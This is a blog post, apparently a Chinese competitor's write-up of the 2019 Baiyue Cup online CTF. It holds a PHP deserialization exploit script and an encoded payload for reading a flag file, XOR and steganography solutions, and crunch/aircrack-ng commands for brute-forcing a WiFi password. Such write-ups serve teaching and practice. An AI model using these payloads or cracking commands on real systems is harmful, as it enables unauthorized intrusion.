White's Blog.

2019百越杯线上赛Writeup

字数统计: 549Reading time: 2 min
2019/11/11 Share

11月10日“百越杯”线上选拔赛开打,记录下WP。题目附件

Web

web1

京津冀大学生竞赛原题,改日再来复现分析。
参考: https://www.cnblogs.com/20175211lyz/p/11560311.html

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?php
error_reporting(3);
class Read {
public $var;
}

class Show
{
public $source;
public $str;
}

class Test
{
public $params;
}

$c = new Read();
$c->var = 'fllllllaaaaaag';
$b = new Test();
$b->params = $c;
$d = new Show();
$d->str = array('str'=>$b);
$a = new Show();
$a->source = $d;

echo serialize($a);

payload:

1
chal=O%3A4%3A"Show"%3A2%3A%7Bs%3A6%3A"source"%3BO%3A4%3A"Show"%3A2%3A%7Bs%3A6%3A"source"%3Bs%3A9%3A"index.php"%3Bs%3A3%3A"str"%3Ba%3A1%3A%7Bs%3A3%3A"str"%3BO%3A4%3A"Test"%3A1%3A%7Bs%3A6%3A"params"%3BO%3A4%3A"Read"%3A1%3A%7Bs%3A9%3A"%00Read%00var"%3Bs%3A18%3A"fllllllaaaaaag.php"%3B%7D%7D%7D%7Ds%3A3%3A"str"%3BN%3B%7D

Misc:

key

分析

开是一张图片,放入010中能看到KEY:ISEEU!。图片放大能发现颜色不太一样。把图片的RGB值导出,然后根据经验与key进行亦或得到flag

exp:

1
2
3
4
5
6
7
rgb=['2f','3f','24','22','2e','13','7f','66','24','71','36','45','7b','7e','27','72','33','10','64','67','21','76','67','0c','70','37','23','72','78','16','7a','60','20','21','33','45','7b','32','77','74','37','5c']
key='ISEEU!'
j=0
for i in rgb:
print(chr(int(i,16)^ord(key[j])),end='')
j+=1
j%=6

哈尔的移动城堡

解题

用010打开102%,文件头改为PNG,图片就能打开。

-w727

接着看到文件尾部分有50 4B考虑有zip文件。到PNG的文件尾,发现有点像ZIP文件头,手动修改导出zip文件成功。

-w727

用StegSolve观察到102%.png有二维码的痕迹,同样ori.png内也有二维码的痕迹,尝试将两个图利用StegSolve结合。结果不成后来想了想因为102%为灰度图,所以将ori用PS也转为灰度图。

-w727

然后用扫出来的内容1tsEz_b14ndVV4t3rM4k解压11B64.zip ,得到里面的两张图片。

-w727

两张图片特别像,用StegSolve继续撸,发现将两张图xor 即可看到flag,但是依旧十分模糊

-w727

继续用StegSolve换色道

-w727

Wireless

解题

打开题目提示password:6666xxxx,想到爆破wifi密码。
用crunch 8 8 -t 6666%%%% >> wifipass.txt 构造爆破字典
aircrack-ng 进行爆破
aircrack-ng -w wifipasss.txt WiFi.pcap

-w727

得到密码

-w727

Reverse:

全是原题。。。

原文作者:White

发表日期:November 11th 2019, 9:40:10 pm

更新日期:November 11th 2019, 10:34:52 pm

CATALOG
  1. 1. Web
    1. 1.1. web1
      1. 1.1.1. exp:
      2. 1.1.2. payload:
  2. 2. Misc:
    1. 2.1. key
      1. 2.1.1. 分析
    2. 2.2. exp:
    3. 2.3. 哈尔的移动城堡
      1. 2.3.1. 解题
    4. 2.4. Wireless
      1. 2.4.1. 解题
  3. 3. Reverse: